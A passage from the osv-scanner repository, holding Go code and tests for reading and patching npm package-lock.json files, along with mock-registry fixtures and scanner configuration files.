"@fake-registry/d": { "version": "2.2.2", "resolved": "http://localhost:4873/@fake-registry%2fd/-/d-2.2.2.tgz", "integrity": "sha512-YLeJVbfOCJZcUizGgpvPesIVSY9TYmWz2HcF+7mWxSuXuvu13FABprnRSDGEhljBRM+QAaUD+nbUHWenq2vL4w==", "dev": true }, "a-dev": { "version": "npm:@fake-registry/a@2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "requires": { "@fake-registry/b": "*" }, "dependencies": { "@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "requires": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } } } }, "w": { "version": "file:W", "requires": { "@fake-registry/a": "^2.3.4" }, "dependencies": { "@fake-registry/a": { "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "requires": { "@fake-registry/b": "*" } }, "@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "requires": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } } } } } } --- ================================================ FILE: internal/resolution/lockfile/lockfile.go ================================================ // Package lockfile provides functionality for reading and writing lockfiles. package lockfile import ( "bytes" "fmt" "io" "os" "path/filepath" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution/depfile" ) type DependencyPatch struct { Pkg resolve.PackageKey OrigVersion string NewVersion string } type ReadWriter interface { // System returns which ecosystem this ReadWriter is for. System() resolve.System // Read parses a lockfile into a resolved graph Read(file depfile.DepFile) (*resolve.Graph, error) // Write applies the DependencyPatches to the lockfile, with minimal changes to the file. // `original` is the original lockfile to read from. The updated lockfile is written to `output`. Write(original depfile.DepFile, output io.Writer, patches []DependencyPatch) error } func Overwrite(rw ReadWriter, filename string, patches []DependencyPatch) error { r, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } var buf bytes.Buffer err = rw.Write(r, &buf, patches) r.Close() // Make sure the file is closed before we start writing to it. if err != nil { return err } //nolint:gosec // Complaining about the 0644 permissions. // The file already exists anyway so the permissions don't matter. if err := os.WriteFile(filename, buf.Bytes(), 0644); err != nil { return err } return nil } func GetReadWriter(pathToLockfile string) (ReadWriter, error) { base := filepath.Base(pathToLockfile) switch base { case "package-lock.json": return NpmReadWriter{}, nil default: return nil, fmt.Errorf("unsupported lockfile type: %s", base) } } ================================================ FILE: internal/resolution/lockfile/npm.go ================================================ package lockfile import ( "encoding/json" "errors" "fmt" "io" "path/filepath" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" ) type NpmReadWriter struct{} func (NpmReadWriter) System() resolve.System { return resolve.NPM } type npmLockDependency struct { // For an aliased package, Version is like "npm:[name]@[version]" Version string `json:"version"` Dependencies map[string]npmLockDependency `json:"dependencies,omitempty"` Dev bool `json:"dev,omitempty"` Optional bool `json:"optional,omitempty"` Requires map[string]string `json:"requires,omitempty"` } type npmLockPackage struct { // For an aliased package, Name is the real package name Name string `json:"name"` Version string `json:"version"` Resolved string `json:"resolved"` Dependencies map[string]string `json:"dependencies,omitempty"` DevDependencies map[string]string `json:"devDependencies,omitempty"` OptionalDependencies map[string]string `json:"optionalDependencies,omitempty"` PeerDependencies map[string]string `json:"peerDependencies,omitempty"` Dev bool `json:"dev,omitempty"` DevOptional bool `json:"devOptional,omitempty"` Optional bool `json:"optional,omitempty"` Link bool `json:"link,omitempty"` } type npmLockfile struct { Version int `json:"lockfileVersion"` // npm v1- lockfiles use "dependencies" Dependencies map[string]npmLockDependency `json:"dependencies,omitempty"` // npm v2+ lockfiles use "packages" Packages map[string]npmLockPackage `json:"packages,omitempty"` } type npmDependencyVersionSpec struct { Version string DepType dep.Type } type npmNodeModule struct { NodeID resolve.NodeID Parent *npmNodeModule Children map[string]*npmNodeModule // keyed on package name Deps map[string]npmDependencyVersionSpec ActualName string // set if the node is an alias, the real package name this refers to } func (n npmNodeModule) IsAliased() bool { return len(n.ActualName) > 0 } func (rw NpmReadWriter) Read(file depfile.DepFile) (*resolve.Graph, error) { dec := json.NewDecoder(file) var lockJSON npmLockfile if err := dec.Decode(&lockJSON); err != nil { return nil, err } // Build the node_modules directory tree in memory & add unconnected nodes into graph var g *resolve.Graph var nodeModuleTree *npmNodeModule var err error switch { case lockJSON.Packages != nil: g, nodeModuleTree, err = rw.nodesFromPackages(lockJSON) case lockJSON.Dependencies != nil: manifestFile, ferr := file.Open("package.json") if ferr != nil { return nil, fmt.Errorf("failed to open package.json (required for parsing lockfileVersion 1): %w", err) } defer manifestFile.Close() g, nodeModuleTree, err = rw.nodesFromDependencies(lockJSON, manifestFile) default: return nil, errors.New("no dependencies in package-lock.json") } if err != nil { return nil, fmt.Errorf("error when parsing package-lock.json: %w", err) } // Traverse the graph (somewhat inefficiently) to add edges between nodes aliasNodes := make(map[resolve.NodeID]string) todo := []*npmNodeModule{nodeModuleTree} seen := make(map[*npmNodeModule]struct{}) seen[nodeModuleTree] = struct{}{} for len(todo) > 0 { node := todo[0] todo = todo[1:] if node.IsAliased() { // Note which nodes that have to be renamed because of aliasing // Don't rename them now because we rely on the names for working out edges aliasNodes[node.NodeID] = node.ActualName } // Add the directory's children to the queue for _, child := range node.Children { if _, ok := seen[child]; !ok { todo = append(todo, child) seen[child] = struct{}{} } } // Add edges to the correct dependency nodes for depName, depSpec := range node.Deps { depNode := rw.findDependencyNode(node, depName) if depNode == -1 { // The dependency is apparently not in the package-lock.json. // This probably means the lockfile is malformed, and npm would usually error installing this. // But there are some cases (with workspaces) that npm doesn't error. // We just always ignore the error to make it work. // TODO: g.AddError(...) continue } if err := g.AddEdge(node.NodeID, depNode, depSpec.Version, depSpec.DepType); err != nil { return nil, err } } } // Add alias KnownAs attribute and rename them correctly for i, e := range g.Edges { if _, ok := aliasNodes[e.To]; ok { name := g.Nodes[e.To].Version.Name g.Edges[i].Type.AddAttr(dep.KnownAs, name) } } for i := range g.Nodes { if name, ok := aliasNodes[resolve.NodeID(i)]; ok { g.Nodes[i].Version.Name = name } } return g, nil } func (rw NpmReadWriter) findDependencyNode(node *npmNodeModule, depName string) resolve.NodeID { // Walk up the node_modules to find which node would be used as the requirement for node != nil { if child, ok := node.Children[depName]; ok { return child.NodeID } node = node.Parent } return resolve.NodeID(-1) } func (rw NpmReadWriter) reVersionAliasedDeps(deps map[string]npmDependencyVersionSpec) { // for the dependency maps, change versions from "npm:pkg@version" to "version" for k, v := range deps { _, v.Version = manifest.SplitNPMAlias(v.Version) deps[k] = v } } func (rw NpmReadWriter) Write(original depfile.DepFile, output io.Writer, patches []DependencyPatch) error { var buf strings.Builder _, err := io.Copy(&buf, original) if err != nil { return err } lock := buf.String() patchMap := make(map[string]map[string]string) // name -> old -> new for _, p := range patches { if _, ok := patchMap[p.Pkg.Name]; !ok { patchMap[p.Pkg.Name] = make(map[string]string) } patchMap[p.Pkg.Name][p.OrigVersion] = p.NewVersion } api, err := datasource.NewNpmRegistryAPIClient(filepath.Dir(original.Path())) if err != nil { return err } if lock, err = rw.modifyPackageLockPackages(lock, patchMap, api); err != nil { return err } if lock, err = rw.modifyPackageLockDependencies(lock, patchMap, api); err != nil { return err } // Write out modified package-lock.json _, err = io.WriteString(output, lock) return err } ================================================ FILE: internal/resolution/lockfile/npm_test.go ================================================ package lockfile_test import ( "bytes" "os" "path/filepath" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/schema" "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestNpmReadV2(t *testing.T) { t.Parallel() // This lockfile was generated using a private registry with https://verdaccio.org/ // Mock packages were published to it and installed with npm. df, err := depfile.OpenLocalDepFile("./testdata/npm_v2/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` r 1.0.0 @fake-registry/a@^1.2.3 1.2.3 Opt|$b@^1.0.0 b: @fake-registry/b@^1.0.1 1.0.1 Dev KnownAs a-dev|@fake-registry/a@^2.3.4 2.3.4 @fake-registry/b@^2.0.0 2.0.0 c: @fake-registry/c@^1.0.0 1.1.1 Scope peer|$d@^2.0.0 d: @fake-registry/d@^2.0.0 2.2.2 # workspace w@* 1.0.0 Dev|@fake-registry/a@^2.3.4 2.3.4 @fake-registry/b@^2.0.0 2.0.0 $c@^1.0.0 $d@^2.0.0 `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmReadV1(t *testing.T) { t.Parallel() // This lockfile was generated using a private registry with https://verdaccio.org/ // Mock packages were published to it and installed with npm. df, err := depfile.OpenLocalDepFile("./testdata/npm_v1/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` r 1.0.0 @fake-registry/a@^1.2.3 1.2.3 $b@^1.0.0 b: @fake-registry/b@^1.0.1 1.0.1 Dev KnownAs a-dev|@fake-registry/a@^2.3.4 2.3.4 # all indirect dependencies become regular because it's impossible to tell type in v1 @fake-registry/b@^2.0.0 2.0.0 @fake-registry/c@^1.0.0 1.1.1 # peerDependencies are not supported in v1 @fake-registry/d@^2.0.0 2.2.2 # v1 does not support workspaces `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmReadTypeOrder(t *testing.T) { t.Parallel() // Testing the behavior when a package is included in multiple dependency type fields. // Empirically, devDependencies > optionalDependencies > dependencies > peerDependencies // This lockfile was manually constructed. df, err := depfile.OpenLocalDepFile("./testdata/npm_type_order/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` root 1.0.0 Dev|a@4.0.0 4.0.0 Opt|b@3.0.0 3.0.0 c@2.0.0 2.0.0 Scope peer|d@1.0.0 1.0.0 `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmWrite(t *testing.T) { t.Parallel() // Set up mock npm registry srv := testutility.NewMockHTTPServer(t) srv.SetResponseFromFile(t, "/@fake-registry%2fa/1.2.4", "./testdata/npm_registry/@fake-registry-a-1.2.4.json") srv.SetResponseFromFile(t, "/@fake-registry%2fa/2.3.5", "./testdata/npm_registry/@fake-registry-a-2.3.5.json") // Copy package-lock.json to temporary directory dir := testutility.CreateTestDir(t) b, err := os.ReadFile("./testdata/npm_v2/package-lock.json") if err != nil { t.Fatalf("could not read test file: %v", err) } file := filepath.Join(dir, "package-lock.json") if err := os.WriteFile(file, b, 0600); err != nil { t.Fatalf("could not copy test file: %v", err) } // create an npmrc file in temp directory pointing to mock registry npmrcFile, err := os.Create(filepath.Join(dir, ".npmrc")) if err != nil { t.Fatalf("could not create .npmrc file: %v", err) } if _, err := npmrcFile.WriteString("registry=" + srv.URL); err != nil { t.Fatalf("failed writing npmrc file: %v", err) } patches := []lockfile.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "@fake-registry/a", }, OrigVersion: "1.2.3", NewVersion: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "@fake-registry/a", }, OrigVersion: "2.3.4", NewVersion: "2.3.5", }, } df, err := depfile.OpenLocalDepFile(file) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() buf := new(bytes.Buffer) npmRW := lockfile.NpmReadWriter{} if err := npmRW.Write(df, buf, patches); err != nil { t.Fatalf("unable to update npm package-lock.json: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, buf.String()) } ================================================ FILE: internal/resolution/lockfile/npm_v1.go ================================================ package lockfile import ( "context" "encoding/json" "fmt" "io" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/tidwall/gjson" "github.com/tidwall/sjson" ) // Old-style (npm < 7 / lockfileVersion 1) dependencies structure // https://docs.npmjs.com/cli/v6/configuring-npm/package-lock-json // Installed packages stored in recursive "dependencies" object // with "requires" field listing direct dependencies, and each possibly having their own "dependencies" // No dependency information package-lock.json for the root node, so we must also have the package.json func (rw NpmReadWriter) nodesFromDependencies(lockJSON npmLockfile, manifestFile io.Reader) (*resolve.Graph, *npmNodeModule, error) { // Need to grab the root requirements from the package.json, since it's not in the lockfile var manifestJSON manifest.PackageJSON if err := json.NewDecoder(manifestFile).Decode(&manifestJSON); err != nil { return nil, nil, err } nodeModuleTree := &npmNodeModule{ Children: make(map[string]*npmNodeModule), Deps: make(map[string]npmDependencyVersionSpec), } // The order we process dependency types here is to match npm's behavior. for name, version := range manifestJSON.PeerDependencies { var typ dep.Type typ.AddAttr(dep.Scope, "peer") // TODO: check peerDependenciesMeta for optional peer dependencies nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: typ} } for name, version := range manifestJSON.Dependencies { nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version} } for name, version := range manifestJSON.OptionalDependencies { nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Opt)} } for name, version := range manifestJSON.DevDependencies { nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Dev)} } rw.reVersionAliasedDeps(nodeModuleTree.Deps) var g resolve.Graph nodeModuleTree.NodeID = g.AddNode(resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: manifestJSON.Name, }, VersionType: resolve.Concrete, Version: manifestJSON.Version, }) err := rw.computeDependenciesRecursive(&g, nodeModuleTree, lockJSON.Dependencies) return &g, nodeModuleTree, err } func (rw NpmReadWriter) computeDependenciesRecursive(g *resolve.Graph, parent *npmNodeModule, deps map[string]npmLockDependency) error { for name, d := range deps { actualName, version := manifest.SplitNPMAlias(d.Version) nID := g.AddNode(resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Concrete, Version: version, }) nm := &npmNodeModule{ Parent: parent, NodeID: nID, Children: make(map[string]*npmNodeModule), Deps: make(map[string]npmDependencyVersionSpec), ActualName: actualName, } // The requires map includes regular dependencies AND optionalDependencies // but it does not include peerDependencies or devDependencies. // The generated graphs will lack the edges between peers for name, version := range d.Requires { nm.Deps[name] = npmDependencyVersionSpec{Version: version} } rw.reVersionAliasedDeps(nm.Deps) parent.Children[name] = nm if d.Dependencies != nil { if err := rw.computeDependenciesRecursive(g, nm, d.Dependencies); err != nil { return err } } } return nil } func (rw NpmReadWriter) modifyPackageLockDependencies(lockJSON string, patches map[string]map[string]string, api *datasource.NpmRegistryAPIClient) (string, error) { if !gjson.Get(lockJSON, "dependencies").Exists() { return lockJSON, nil } return rw.modifyPackageLockDependenciesRecurse(lockJSON, "dependencies", 1, patches, api) } func (rw NpmReadWriter) modifyPackageLockDependenciesRecurse(lockJSON, path string, depth int, patches map[string]map[string]string, api *datasource.NpmRegistryAPIClient) (string, error) { for pkg, data := range gjson.Get(lockJSON, path).Map() { pkgPath := fmt.Sprintf("%s.%s", path, gjson.Escape(pkg)) if data.Get("dependencies").Exists() { var err error lockJSON, err = rw.modifyPackageLockDependenciesRecurse(lockJSON, pkgPath+".dependencies", depth+1, patches, api) if err != nil { return lockJSON, err } } isAlias := false realPkg, version := manifest.SplitNPMAlias(data.Get("version").String()) if realPkg != "" { isAlias = true pkg = realPkg } if upgrades, ok := patches[pkg]; ok { if newVer, ok := upgrades[version]; ok { // update dependency in place npmData, err := api.FullJSON(context.Background(), pkg, newVer) if err != nil { return lockJSON, err } // From what I can tell, the only fields to update are "version" "resolved" "integrity" and "requires" newVersion := npmData.Get("version").String() if isAlias { newVersion = fmt.Sprintf("npm:%s@%s", pkg, newVersion) } lockJSON, _ = sjson.Set(lockJSON, pkgPath+".version", newVersion) lockJSON, _ = sjson.Set(lockJSON, pkgPath+".resolved", npmData.Get("dist.tarball").String()) lockJSON, _ = sjson.Set(lockJSON, pkgPath+".integrity", npmData.Get("dist.integrity").String()) // formatting & padding to output for the correct level at this depth pretty := fmt.Sprintf("|@pretty:{\"prefix\": %q}", strings.Repeat(" ", 4*depth+2)) reqs := npmData.Get("dependencies" + pretty) if !reqs.Exists() { lockJSON, _ = sjson.Delete(lockJSON, pkgPath+".requires") } else { text := reqs.Raw // remove trailing newlines that @pretty creates for objects text = strings.TrimSuffix(text, "\n") lockJSON, _ = sjson.SetRaw(lockJSON, pkgPath+".requires", text) } } } } return lockJSON, nil } ================================================ FILE: internal/resolution/lockfile/npm_v2.go ================================================ package lockfile import ( "cmp" "context" "errors" "maps" "path/filepath" "slices" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/tidwall/gjson" "github.com/tidwall/pretty" "github.com/tidwall/sjson" ) // New-style (npm >= 7 / lockfileVersion 2+) structure // https://docs.npmjs.com/cli/v9/configuring-npm/package-lock-json // Installed packages are in the flat "packages" object, keyed by the install path // e.g. "node_modules/foo/node_modules/bar" // packages contain most information from their own manifests. func (rw NpmReadWriter) nodesFromPackages(lockJSON npmLockfile) (*resolve.Graph, *npmNodeModule, error) { var g resolve.Graph // Create graph nodes and reconstruct the node_modules folder structure in memory root, ok := lockJSON.Packages[""] if !ok { return nil, nil, errors.New("missing root node") } nID := g.AddNode(resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: root.Name, }, VersionType: resolve.Concrete, Version: root.Version, }) nodeModuleTree := rw.makeNodeModuleDeps(root, true) nodeModuleTree.NodeID = nID // paths for npm workspace subfolders, not inside root node_modules workspaceModules := make(map[string]*npmNodeModule) workspaceModules[""] = nodeModuleTree // iterate keys by node_modules depth for _, k := range rw.packageNamesByNodeModuleDepth(lockJSON.Packages) { if k == "" { // skip the root node continue } pkg, ok := lockJSON.Packages[k] if !ok { panic("key not in packages") } path := strings.Split(k, "node_modules/") if len(path) == 1 { // the path does not contain "node_modules/", assume this is a workspace directory nID := g.AddNode(resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: path[0], // This will get replaced by the name from the symlink }, VersionType: resolve.Concrete, Version: pkg.Version, }) m := rw.makeNodeModuleDeps(pkg, true) // NB: including the dev dependencies m.NodeID = nID workspaceModules[path[0]] = m continue } if pkg.Link { // This is the symlink to the workspace directory in node_modules if len(path) != 2 || path[0] != "" { // Not sure what situation would lead to this panic("Found symlink in package-lock.json that's not in root node_modules directory") } m := workspaceModules[pkg.Resolved] if m == nil { // Can symlinks show up without workspaces? panic("symlink in package-lock.json processed before real directory") } // attach the workspace to the tree pkgName := path[1] nodeModuleTree.Children[pkgName] = m if pkg.Resolved == "" { // weird case: the root directory is symlinked into its own node_modules continue } m.Parent = nodeModuleTree // rename the node to the name it would be referred to as in package.json g.Nodes[m.NodeID].Version.Name = pkgName // add it as a dependency of the root node, so it's not orphaned if _, ok := nodeModuleTree.Deps[pkgName]; !ok { nodeModuleTree.Deps[pkgName] = npmDependencyVersionSpec{Version: "*"} } continue } // find the direct parent package by traversing the path parent := nodeModuleTree if path[0] != "" { // jump to the corresponding workspace if package is in one if parent, ok = workspaceModules[strings.TrimSuffix(path[0], "/")]; !ok { // The package exists in a node_modules of a folder that doesn't belong to this project. // npm seems to silently ignore these, so we will too. continue } } parentFound := true for _, p := range path[1 : len(path)-1] { // skip root directory p = strings.TrimSuffix(p, "/") if parent, parentFound = parent.Children[p]; !parentFound { break } } if !parentFound { // The package this supposed to be installed under is not installed. // npm seems to silently ignore these, so we will too. continue } name := path[len(path)-1] nID := g.AddNode(resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, VersionType: resolve.Concrete, Version: pkg.Version, }) parent.Children[name] = rw.makeNodeModuleDeps(pkg, false) parent.Children[name].NodeID = nID parent.Children[name].Parent = parent parent.Children[name].ActualName = pkg.Name } return &g, nodeModuleTree, nil } func (rw NpmReadWriter) makeNodeModuleDeps(pkg npmLockPackage, includeDev bool) *npmNodeModule { nm := npmNodeModule{ Children: make(map[string]*npmNodeModule), Deps: make(map[string]npmDependencyVersionSpec), } // The order we process dependency types here is to match npm's behavior. for name, version := range pkg.PeerDependencies { var typ dep.Type typ.AddAttr(dep.Scope, "peer") // TODO: check peerDependenciesMeta for optional peer dependencies nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: typ} } for name, version := range pkg.Dependencies { nm.Deps[name] = npmDependencyVersionSpec{Version: version} } for name, version := range pkg.OptionalDependencies { nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Opt)} } if includeDev { for name, version := range pkg.DevDependencies { nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Dev)} } } rw.reVersionAliasedDeps(nm.Deps) return &nm } func (rw NpmReadWriter) packageNamesByNodeModuleDepth(packages map[string]npmLockPackage) []string { keys := slices.AppendSeq(make([]string, 0, len(packages)), maps.Keys(packages)) slices.SortFunc(keys, func(a, b string) int { aSplit := strings.Split(a, "node_modules/") bSplit := strings.Split(b, "node_modules/") if c := cmp.Compare(len(aSplit), len(bSplit)); c != 0 { return c } // sort alphabetically if they're the same depth return cmp.Compare(a, b) }) return keys } func (rw NpmReadWriter) modifyPackageLockPackages(lockJSON string, patches map[string]map[string]string, api *datasource.NpmRegistryAPIClient) (string, error) { packages := gjson.Get(lockJSON, "packages") if !packages.Exists() { return lockJSON, nil } for key, value := range packages.Map() { parts := strings.Split(key, "node_modules/") if len(parts) == 0 { continue } pkg := parts[len(parts)-1] if n := value.Get("name"); n.Exists() { // if this is an alias, use the real package as the name pkg = n.String() } if upgrades, ok := patches[pkg]; ok { if newVer, ok := upgrades[value.Get("version").String()]; ok { fullPath := "packages." + gjson.Escape(key) var err error if lockJSON, err = rw.updatePackage(lockJSON, fullPath, pkg, newVer, api); err != nil { return lockJSON, err } } } } return lockJSON, nil } func (rw NpmReadWriter) updatePackage(jsonText, jsonPath, packageName, newVersion string, api *datasource.NpmRegistryAPIClient) (string, error) { npmData, err := api.FullJSON(context.Background(), packageName, newVersion) if err != nil { return "", err } // The "dependencies" returned from the registry includes (can include?) both optional and regular dependencies // But the "optionalDependencies" are (always?) removed from "dependencies" package-lock.json. for _, opt := range npmData.Get("optionalDependencies|@keys").Array() { depName := gjson.Escape(opt.String()) s, _ := sjson.Delete(npmData.Raw, "dependencies."+depName) npmData = gjson.Parse(s) } if len(npmData.Get("dependencies").Map()) == 0 { s, _ := sjson.Delete(npmData.Raw, "dependencies") npmData = gjson.Parse(s) } pkgData := gjson.Get(jsonText, jsonPath) pkgText := pkgData.Raw // I can't find a consistent list of what fields should be included in package-lock.json packages // https://docs.npmjs.com/cli/v9/configuring-npm/package-lock-json#packages seems list some // but I've seen fields not listed there get included, and fields that it says to include (e.g. license) missing; // Might fill in as much of package.json? https://docs.npmjs.com/cli/v9/configuring-npm/package-json // It also seems to depend on npm version? // Instead, just modify the fields that are present keyArray := pkgData.Get("@keys").Array() // If dependency types were not previously present, we want to add them. necessaryKeys := []string{"dependencies", "optionalDependencies", "peerDependencies"} keys := make([]string, len(keyArray), len(keyArray)+len(necessaryKeys)) for i, key := range keyArray { keys[i] = gjson.Escape(key.String()) } for _, key := range necessaryKeys { if npmData.Get(key).Exists() && !pkgData.Get(key).Exists() { keys = append(keys, key) } } for _, key := range keys { switch key { case "resolved": pkgText, _ = sjson.Set(pkgText, "resolved", npmData.Get("dist.tarball").String()) case "integrity": pkgText, _ = sjson.Set(pkgText, "integrity", npmData.Get("dist.integrity").String()) case "bin": // the api formats the paths as "./path/to", while package-lock.json seem to use "path/to" // TODO: smarter way for indentation newVal := npmData.Get(key) if newVal.Exists() { text := newVal.Raw for k, v := range newVal.Map() { text, _ = sjson.Set(text, k, filepath.Clean(v.String())) } pkgText, _ = sjson.SetRaw(pkgText, "bin", text) } else { // explicitly remove it if it's no longer present pkgText, _ = sjson.Delete(pkgText, "bin") } // if all dependencies have been removed, explicitly remove the field case "dependencies": fallthrough case "devDependencies": // shouldn't show up in package-lock.json fallthrough case "peerDependencies": fallthrough case "optionalDependencies": if !npmData.Get(key).Exists() { // TODO: Think of the orphaned children pkgText, _ = sjson.Delete(pkgText, key) continue } fallthrough default: newVal := npmData.Get(key) if newVal.Exists() { pkgText, _ = sjson.SetRaw(pkgText, key, newVal.Raw) } // if it doesn't exist, assume it's one of the package-lock flags e.g. "dev" // TODO: It could be a removed field } } // pretty the json because setting nested objects breaks the formatting. // Setting Prefix & Indent to account for the fact that this is not the top-level object. pkgText = string(pretty.PrettyOptions([]byte(pkgText), &pretty.Options{Prefix: " ", Indent: " "})) pkgText = strings.TrimSpace(pkgText) // remove leading spaces & newline pretty creates return sjson.SetRaw(jsonText, jsonPath, pkgText) } ================================================ FILE: internal/resolution/lockfile/testdata/npm_registry/@fake-registry-a-1.2.4.json ================================================ { "name": "@fake-registry/a", "version": "1.2.4", "description": "package a", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a author" }, "license": "OriginalLicenseDoNotSteal", "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "_id": "@fake-registry/a@1.2.4", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "shasum": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz" }, "contributors": [] } ================================================ FILE: internal/resolution/lockfile/testdata/npm_registry/@fake-registry-a-2.3.5.json ================================================ { "name": "@fake-registry/a", "version": "2.3.5", "description": "package a@2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a@2 author" }, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" }, "dependencies": { "@fake-registry/b": "*" }, "_id": "@fake-registry/a@2.3.5", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "none", "shasum": "ffffffff", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz" }, "contributors": [] } ================================================ FILE: internal/resolution/lockfile/testdata/npm_v1/osv-scanner.toml ================================================ [[IgnoredVulns]] id = "MAL-2024-7419" reason = "Packages in this test lockfile are not installed" [[IgnoredVulns]] id = "MAL-2024-7420" reason = "Packages in this test lockfile are not installed" ================================================ FILE: internal/resolution/lockfile/testdata/npm_v1/package.json ================================================ { "name": "r", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "@fake-registry/a": "^1.2.3", "@fake-registry/b": "^1.0.1" }, "devDependencies": { "a-dev": "npm:@fake-registry/a@^2.3.4" } } ================================================ FILE: internal/resolution/lockfile/testdata/npm_v2/osv-scanner.toml ================================================ [[IgnoredVulns]] id = "MAL-2024-7419" reason = "Packages in this test lockfile are not installed" [[IgnoredVulns]] id = "MAL-2024-7420" reason = "Packages in this test lockfile are not installed" ================================================ FILE: internal/resolution/lockfile/testmain_test.go ================================================ package lockfile_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/manifest/__snapshots__/maven_test.snap ================================================ [TestMavenReadWrite - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.12 ../bin junit junit ${junit.version} test org.example abc 1.0.1 org.example no-version org.example exclusions 